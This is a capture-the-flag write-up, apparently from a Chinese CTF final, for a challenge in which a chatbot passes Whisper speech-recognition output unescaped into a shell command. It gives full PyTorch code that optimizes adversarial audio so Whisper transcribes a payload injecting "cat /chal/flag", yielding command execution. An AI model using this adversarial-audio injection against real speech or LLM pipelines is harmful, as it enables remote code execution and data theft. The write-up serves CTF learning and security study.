Blind

Challenge Design

Thanks to the real hacker w1z (bi0s). What a cool chall!

This challenge models a setup common in the real world: when a multimodal model is not available, an ASR model first converts speech to text, and the transcript is then handed to an LLM to produce the answer.
By planting a command-injection vulnerability at that seam, the challenge pushes players to explore the Whisper architecture, how the audio is parsed, and the details of gradient propagation and optimization.

Thanks again to w1z. After a seven-hour grind that ended with first blood on this challenge, it felt truly special to me. After rethinking my own solution process, I modified the challenge and deployed it in the offline, air-gapped environment of the onsite round.

WriteUP

The challenge is an AI assistant: you can either chat over text or upload an audio clip to talk to it.
Code auditing reveals command concatenation in the speech-recognition module of app.py: the ASR model's output is spliced directly into a shell command, which gives us RCE.

The vulnerable code also shows that the model's output can carry every symbol the injection needs (quotes, semicolon, slash):
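The original snippet is not reproduced here, so below is a minimal sketch of what the sink in app.py plausibly looks like. The handler and helper names (`handle_audio`, `asr_transcribe`) are my assumptions; only the `python3 chatbot.py '...'` concatenation pattern is confirmed by the payload shown further down.

```python
# hypothetical reconstruction of the sink in app.py: names are assumed
import subprocess

def handle_audio(path):
    text = asr_transcribe(path)  # Whisper transcript: attacker-influenced
    # the transcript is spliced, unescaped, into a shell command
    out = subprocess.run(f"python3 chatbot.py '{text}'",
                         shell=True, capture_output=True, text=True)
    return out.stdout
```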

So we can try to craft an adversarial audio sample that makes the model output exactly:

```
';cat /chal/flag'
```

After concatenation, the executed command becomes:

```
python3 chatbot.py '';cat /chal/flag''
```

From the source code (or the paper), Whisper is essentially an encoder-decoder model. Roughly: the raw waveform is converted to a log-Mel spectrogram, the encoder embeds the spectrogram into audio features, and the decoder autoregressively predicts text tokens conditioned on those features. We just have to run a standard adversarial-example attack against that pipeline.
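For intuition, here is a minimal greedy-decode sketch assembled from the same Whisper internals the exploit below uses (`embed_audio`, `logits`, and the `[50257, 50362]` prefix of the English-only model). It is a stripped-down stand-in for `model.transcribe`, not the library's actual decoding loop.

```python
import torch
from whisper.audio import log_mel_spectrogram, pad_or_trim

@torch.no_grad()
def greedy_decode(model, audio, max_tokens=32, device="cpu"):
    # waveform -> log-Mel spectrogram -> encoder features
    mel = log_mel_spectrogram(audio, model.dims.n_mels, padding=16000 * 30)
    mel = pad_or_trim(mel, 3000).to(device)
    audio_features = model.embed_audio(mel)

    # decoder predicts one token at a time, conditioned on the prefix
    tokens = torch.tensor([[50257, 50362]], device=device)  # [<|startoftranscript|>, <|notimestamps|>]
    for _ in range(max_tokens):
        logits = model.logits(tokens, audio_features)[:, -1]
        next_token = logits.argmax(dim=1, keepdim=True)
        if next_token.item() == 50256:  # <|endoftext|>
            break
        tokens = torch.cat([tokens, next_token], dim=1)
    return tokens
```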

First: in the audio-processing pipeline, you need to understand which parts actually feed into the model and which are mere preprocessing; only then can you attach gradients in the right place. Conveniently, `log_mel_spectrogram` and `pad_or_trim` are built from ordinary torch ops, so gradients flow from the logits all the way back to the raw waveform.
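A quick sanity check of that claim, assuming the `openai-whisper` package is installed:

```python
import torch
from whisper.audio import log_mel_spectrogram, pad_or_trim

adv = torch.randn(1, 16000 * 15, requires_grad=True)  # 15 s of random noise
mel = pad_or_trim(log_mel_spectrogram(adv, 80, padding=16000 * 30), 3000)
mel.sum().backward()
print(adv.grad is not None)  # True: the preprocessing is differentiable
```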

Next, once we have gradient information, the question becomes: how do we use the gradients from each round? Here are a few different approaches.

Attempt 1: loop indefinitely, optimizing one token at a time until each one locks in:

```python
for i in range(num_iterations):
    tokens = torch.tensor([[50257, 50362]], device=DEVICE)  # [<|startoftranscript|>, <|notimestamps|>]

    for target_token in target_tokens:
        # for each target position, keep stepping until the model's argmax agrees
        for j in range(100000):
            optimizer.zero_grad()

            mel = log_mel_spectrogram(adv, model.dims.n_mels, padding=16000 * 30)
            mel = pad_or_trim(mel, 3000).to(model.device)
            audio_features = model.embed_audio(mel)

            logits = model.logits(tokens, audio_features)[:, -1]

            if torch.argmax(logits, dim=1) == target_token:
                break

            loss = loss_fn(logits, torch.tensor([target_token], device=DEVICE))
            loss.backward()
            optimizer.step()

        tokens = torch.cat([tokens, torch.tensor([[target_token]], device=DEVICE)], dim=1)

    print(tokens.tolist())
```

Terrible. Prediction is a holistic process: after optimizing we get [SOT, NOTS, token1],
but nothing guarantees token1 stays untouched while we optimize token2. On the next pass it easily degenerates into [SOT, NOTS, bad_token, token2].

Attempt 2: accumulate the loss over all target tokens and take a single optimization step:

```python
for i in range(num_iterations):
    tokens = torch.tensor([[50257, 50362]], device=DEVICE)  # [<|startoftranscript|>, <|notimestamps|>]
    total_loss = 0
    optimizer.zero_grad()

    for target_token in target_tokens:
        mel = log_mel_spectrogram(adv, model.dims.n_mels, padding=16000 * 30)
        mel = pad_or_trim(mel, 3000).to(model.device)
        audio_features = model.embed_audio(mel)

        logits = model.logits(tokens, audio_features)[:, -1]
        loss = loss_fn(logits, torch.tensor([target_token], device=DEVICE))
        total_loss += loss
        # teacher forcing: extend the prefix with the ground-truth target token
        tokens = torch.cat([tokens, torch.tensor([[target_token]], device=DEVICE)], dim=1)

    total_loss.backward()
    optimizer.step()
    adv.data = adv.data.clamp(-1, 1)

    print(tokens.tolist())
```

Also terrible: the accumulated gradient is far too large, the update direction drowns in noise, and the optimizer never finds its way.
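One obvious mitigation (my own note, not part of the original attempts) is to keep the step size independent of the payload length by averaging the per-token losses before the backward pass:

```python
# swap the backward pass in the loop above for an averaged one
(total_loss / len(target_tokens)).backward()
optimizer.step()
```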

Attempt 3: shrink the noise by making every step start from reality: instead of teacher-forcing the target tokens into the prefix, condition on whatever the model actually predicts (free-running decoding):

```python
for i in range(num_iterations):
    tokens = torch.tensor([[50257, 50362]], device=DEVICE)  # [<|startoftranscript|>, <|notimestamps|>]
    total_loss = 0
    optimizer.zero_grad()

    for target_token in target_tokens:
        mel = log_mel_spectrogram(adv, model.dims.n_mels, padding=16000 * 30)
        mel = pad_or_trim(mel, 3000).to(model.device)
        audio_features = model.embed_audio(mel)

        logits = model.logits(tokens, audio_features)[:, -1]
        loss = loss_fn(logits, torch.tensor([target_token], device=DEVICE))
        total_loss += loss
        # free running: extend the prefix with whatever the model predicts
        next_token = torch.argmax(logits, dim=1, keepdim=True)
        tokens = torch.cat([tokens, next_token], dim=1)

    total_loss.backward()
    optimizer.step()
    adv.data = adv.data.clamp(-1, 1)

    print(tokens.tolist())
```

Bad as well. In practice the gradients look healthy at first, then slowly blow up.
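To watch the blow-up yourself, add a one-line gradient-norm probe (not in the original) inside the loop above:

```python
# right after total_loss.backward() in the loop above
grad_norm = adv.grad.norm().item()
print(f"iter {i}: grad_norm={grad_norm:.3f}")  # climbs steadily before the run derails
```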

EXP

In the end I found a token-by-token optimization scheme that keeps the gradients from falling apart by aligning the prefix in advance: within each outer iteration, every target position gets exactly one optimizer step, and the prefix is always extended with the target token (teacher forcing), so earlier positions keep being reinforced while later ones are learned.

The exploit below was written by me personally and earned praise from the challenge author. The original author w1z also used this version in the official WP, so there is no question of plagiarism.

```python
import torch
from whisper import load_model
from whisper.audio import log_mel_spectrogram, pad_or_trim
from whisper.tokenizer import get_tokenizer
import torchaudio
from torch import nn

DEVICE = "mps"  # Apple Silicon; use "cuda" or "cpu" as appropriate
target_text = "';cat /chal/flag'"
model = load_model("tiny.en.pt", device=DEVICE)  # keep model and adv on the same device
model.eval()
tokenizer = get_tokenizer(
    model.is_multilingual,
    num_languages=model.num_languages,
    language="en",
    task="transcribe",
)
target_tokens = tokenizer.encode(target_text)
target_tokens = target_tokens + [50256]  # append <|endoftext|>

print(target_tokens)


adv = torch.randn(1, 16000 * 15, device=DEVICE, requires_grad=True)  # 15 s of noise
optimizer = torch.optim.Adam([adv], lr=0.01)
loss_fn = nn.CrossEntropyLoss()

num_iterations = 50
for i in range(num_iterations):
    tokens = torch.tensor([[50257, 50362]], device=DEVICE)  # [<|startoftranscript|>, <|notimestamps|>]
    for target_token in target_tokens:
        optimizer.zero_grad()

        mel = log_mel_spectrogram(adv, model.dims.n_mels, padding=16000 * 30)
        mel = pad_or_trim(mel, 3000).to(model.device)
        audio_features = model.embed_audio(mel)

        logits = model.logits(tokens, audio_features)[:, -1]
        loss = loss_fn(logits, torch.tensor([target_token], device=DEVICE))
        loss.backward()
        optimizer.step()
        adv.data = adv.data.clamp(-1, 1)

        # teacher forcing: extend the prefix with the *target* token,
        # so every position gets exactly one step per outer iteration
        tokens = torch.cat([tokens, torch.tensor([[target_token]], device=DEVICE)], dim=1)

    print(tokens.tolist())
    print(f"Iteration {i+1}/{num_iterations}, Loss: {loss.item():.4f}")


torchaudio.save("adversarial.wav", adv.detach().cpu(), 16000)

print("\nTranscribing generated adversarial audio:")
result = model.transcribe(adv.detach().cpu().squeeze(0))
print(result["text"])
```
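Finally, a local sanity check (my addition; `chatbot.py` and the quoting pattern come from the challenge, and the exact sink in app.py may differ) that the transcript reassembles into the injected command:

```python
# simulate the vulnerable concatenation locally
transcript = result["text"].strip()
cmd = f"python3 chatbot.py '{transcript}'"
print(cmd)  # expect: python3 chatbot.py '';cat /chal/flag''
```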

Rants

Releasing the challenge before the competition started, what kind of move is that???

21 teams solved it in the onsite finals. I genuinely feel CN CTF's skill level has taken a big leap. Feel free to come to NK or r3 and carry me……

koali: "Well written, keep it up next time."